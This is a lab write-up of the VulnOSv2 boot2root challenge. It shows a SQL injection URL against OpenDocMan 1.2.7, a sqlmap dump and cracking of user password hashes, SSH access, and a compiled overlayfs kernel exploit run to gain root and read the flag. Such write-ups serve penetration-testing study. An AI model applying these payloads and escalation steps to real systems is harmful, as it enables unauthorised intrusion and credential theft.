VulnOSv2
This is another boot2root from my OSCP list hosted by vulnhub.com and TryHackMe.com.
The challenge is as follows: “Your assignment is to pentest a company website, get root of the system and read the final flag”
So let’s get cracking.
Converting
This VM was created in Virtualbox and exported as .vdi
I use VMware and VMware doesn’t play with vdi. So what to do besides installing Virtualbox?
Here is how:
First I download a program called qemu-img
root@redteam:~# apt install qemu-utils qemu-block-extra -y
Then I download the VM from vulnhub.com and extract the 7z file.
root@redteam:~/Downloads# 7z x VulnOSv2.7z 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21 p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-6500U CPU @ 2.50GHz (406E3),ASM,AES-NI) Scanning the drive for archives: 1 file, 799933398 bytes (763 MiB) Extracting archive: VulnOSv2.7z -- Path = VulnOSv2.7z Type = 7z Physical Size = 799933398 Headers Size = 240 Method = LZMA:25 BCJ Solid = + Blocks = 2 Everything is Ok Folders: 1 Files: 3 Size: 2998942644 Compressed: 799933398
When that is done, run the following command to convert the vdi file to an vmdk file
root@redteam:~/Downloads/VulnOSv2# qemu-img convert -f vdi -O vmdk VulnOSv2.vdi VulnOSv2.vmdk root@redteam:~/Downloads/VulnOSv2# ls VulnOSv2.vbox VulnOSv2.vbox-prev VulnOSv2.vdi VulnOSv2.vmdk
And there you have it. Now you can create a new VM in VMware and replace the HDD with this vmdk.
Ok now that this VM runs in VMware I can start.
Recon
Starting with a nmap scan.
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA) | 2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA) | 256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA) |_ 256 71:bc:6b:7b:56:02:a4:8e:ce:1c:8e:a6:1e:3a:37:94 (ED25519) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) | http-methods: |_ Supported Methods: POST OPTIONS GET HEAD |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: VulnOSv2 6667/tcp open irc ngircd MAC Address: 00:0C:29:83:0D:CE (VMware) Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap found the following ports/services:
- SSH server running on port 22, version 6.6.1p1
- Apache HTTP server, version 2.4.7
- IRC server
Nmap also thinks it runs on Ubuntu.
SSH ~ first try
There are newer versions, but this one doesn’t look like it’s vulnerable.
root@redteam:~/Downloads/VulnOSv2# ssh 192.168.50.138 The authenticity of host '192.168.50.138 (192.168.50.138)' can't be established. ECDSA key fingerprint is SHA256:nIyyJRPJMy1g6F5m8AIT7W//x6lj3ZqhUbYuvSafKeI. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.50.138' (ECDSA) to the list of known hosts. root@192.168.50.138's password:
Also there is no banner, which sometimes give useful information.
HTTP
When browsing to the IP address there is the same information as was in the description on vulnhub.com
There is also a link to the main webpage of the mentioned company.
At the bottom of the page there is a footer: 2019 © Vulnerable since 1980
That’s a nice statement and also it let me to believe the IRC server is the real culprit here…..but first things first.
Also the favicon is that of drupal. Maybe there is a login page and it’s more then just a static site.
On the Documentation there is a nifty piece of security.
Looks like there is nothing…..but then
Like I said….nifty security. Of course this text is visible in the source code, but this was more fun to show.
So let’s take a look at /jabcd0cs/
When visiting this page I get a login section and a software name + version: OpenDocMan v1.2.7
root@redteam:~/Downloads/VulnOSv2# searchsploit opendocman 1.2.7
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
OpenDocMan 1.2.7 - Multiple Vulnerabilities | exploits/php/webapps/32075.txt
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
The vulnerabilities are:
- SQL Injection
- Improper Access Control
I try the SQL injection first. The vulnerability exists in the improper validation of the add_value parameter
http://192.168.50.138/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9
GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user HTTP/1.1 Host: 192.168.50.138 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: SpryMedia_DataTables_filetable_out.php=%7B%22iCreate%22%3A1559305767887%2C%22iStart%22%3A0%2C%22iEnd%22%3A6%2C%22iLength%22%3A10%2C%22sFilter%22%3A%22%22%2C%22sFilterEsc%22%3Atrue%2C%22aaSorting%22%3A%5B%20%5B0%2C%22asc%22%5D%5D%2C%22aaSearchCols%22%3A%5B%20%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%2C%5B%22%22%2Ctrue%5D%5D%2C%22abVisCols%22%3A%5B%20true%2Ctrue%2Ctrue%2Ctrue%2Ctrue%2Ctrue%2Ctrue%2Ctrue%2Ctrue%2Ctrue%2Ctrue%5D%7D; has_js=1; PHPSESSID=p5okl28r5bjd8o60sleb0n4ds4 Connection: close Upgrade-Insecure-Requests: 1
With Burp I captured the HTTP header so I can run it through SQLmap.
When injecting the URL parameter I can retrieve the current user on which this program runs.
With other words, this software runs as root on the local system. Never a good idea, because when you can compromise the program, you compromise the system immediately on root level.
For now I would like to get the username/password table. For this task I use sqlmap
After it ran I found the usernames from database jabcd0cs
Database: jabcd0cs Table: odm_user [3 entries] +----------+ | username | +----------+ | guest | | n0w4n | | webmin | +----------+
The passwords were stored as hashes and only 2 were known for their plaintext strings.
Database: jabcd0cs Table: odm_user [3 entries] +------------------------------------------+ | password | +------------------------------------------+ | 084e0343a0486ff05530df6c705c8bb4 (guest) | | 1a1dc91c907325c69271ddf0c944bc72 (pass) | | b78aae356709f8c31118ea613980954b | +------------------------------------------+
There is a nice python script, which can be found on github, that can help you when you’re stuck with a hash.
root@redteam:~/Hash-Buster# python3 hash.py -s b78aae356709f8c31118ea613980954b _ _ ____ ____ _ _ ___ _ _ ____ ___ ____ ____ |__| |__| [__ |__| |__] | | [__ | |___ |__/ | | | | ___] | | |__] |__| ___] | |___ | \ v3.0 [!] Hash function : MD5 webmin1980
And there is the joke of the footer found earlier.
SSH ~ second try
root@redteam:~# ssh webmin@192.168.50.138
webmin@192.168.50.138's password:
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)
* Documentation: https://help.ubuntu.com/
System information as of Fri May 31 15:33:28 CEST 2019
System load: 0.0 Memory usage: 4% Processes: 65
Usage of /: 5.7% of 29.91GB Swap usage: 0% Users logged in: 0
Graph this data and manage this system at:
https://landscape.canonical.com/
Last login: Wed May 4 10:41:07 2016
$ id
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)
Now for some system recon.
$ python -c 'import pty;pty.spawn("/bin/bash");'
webmin@VulnOSv2:~$ pwd
/home/webmin
webmin@VulnOSv2:~$ ls -lah
total 596K
drwxr-x--- 3 webmin webmin 4.0K May 3 2016 .
drwxr-xr-x 4 root root 4.0K Apr 16 2016 ..
-rw------- 1 webmin webmin 85 May 4 2016 .bash_history
-rw-r--r-- 1 webmin webmin 220 Apr 9 2014 .bash_logout
-rw-r--r-- 1 webmin webmin 3.6K Apr 9 2014 .bashrc
drwx------ 2 webmin webmin 4.0K Apr 30 2016 .cache
-rw-rw-r-- 1 webmin webmin 566K Apr 30 2016 post.tar.gz
-rw-r--r-- 1 webmin webmin 675 Apr 9 2014 .profile
In the users home folder there is a tarball. To get it onto my system I run a python http server (as python is installed on this system).
And collect the file by curling it and piping it straight to tar to extract the content.
It looks like the files needed to run hydra. Not very useful at the moment.
To do a faster scan of the system I use a recon bash script called LinEnum.
webmin@VulnOSv2:~$ uname -r 3.13.0-24-generic
webmin@VulnOSv2:~$ cat /etc/*-release DISTRIB_ID=Ubuntu DISTRIB_RELEASE=14.04 DISTRIB_CODENAME=trusty DISTRIB_DESCRIPTION="Ubuntu 14.04.4 LTS" NAME="Ubuntu" VERSION="14.04.4 LTS, Trusty Tahr" ID=ubuntu ID_LIKE=debian PRETTY_NAME="Ubuntu 14.04.4 LTS" VERSION_ID="14.04" HOME_URL="http://www.ubuntu.com/" SUPPORT_URL="http://help.ubuntu.com/" BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
Looks like an old kernel which probably has some vulnerabilities.
root@redteam:~# searchsploit kernel 3.13
--------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------- ----------------------------------------
Apple Mac OSX xnu 1228.3.13 - 'Profil' Kernel Memory Leak/Deni | exploits/osx/dos/8264.c
Apple Mac OSX xnu 1228.3.13 - 'macfsstat' Local Kernel Memory | exploits/osx/dos/8263.c
Apple Mac OSX xnu 1228.3.13 - 'zip-notify' Remote Kernel Overf | exploits/osx/dos/8262.c
Apple Mac OSX xnu 1228.3.13 - IPv6-ipcomp Remote kernel Denial | exploits/multiple/dos/5191.c
Linux Kernel 3.13 - SGID Privilege Escalation | exploits/linux/local/33824.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - | exploits/linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - | exploits/linux/local/37293.txt
Linux Kernel 3.13.1 - 'Recvmmsg' Local Privilege Escalation (M | exploits/linux/local/40503.rb
Linux Kernel 3.13/3.14 (Ubuntu) - 'splice()' System Call Local | exploits/linux/dos/36743.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X | exploits/linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Ar | exploits/linux/local/31346.c
Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat (PoC) | exploits/linux/dos/31305.c
--------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Because of the kernel and the OS being Ubuntu there is a good change the exploit is the overlayfs exploit.
To exploit it I copy 37292.c to the remote system and compile it.
webmin@VulnOSv2:/tmp$ gcc kernel.c -o kernel webmin@VulnOSv2:/tmp$ ls -lah total 28K drwxrwxrwx 2 root root 4.0K May 31 15:41 . drwxr-xr-x 21 root root 4.0K Apr 3 2016 .. -rwxrwxr-x 1 webmin webmin 12K May 31 15:41 kernel -rw-rw-r-- 1 webmin webmin 5.0K May 31 15:38 kernel.c webmin@VulnOSv2:/tmp$ ./kernel spawning threads mount #1 mount #2 child threads done /etc/ld.so.preload created creating shared library # id uid=0(root) gid=0(root) groups=0(root),1001(webmin)
After compiling and running the program I got my privileges escalated to root. Now for the flag.
# cd /root # ls flag.txt # cat flag.txt Hello and welcome. You successfully compromised the company "JABC" and the server completely !! Congratulations !!! Hope you enjoyed it. What do you think of A.I.?
Conclusion
This was a fun challenge to try.
I don’t have more challenges of the vulnOS series in my list. But I think I’ll definitely give another one a shot.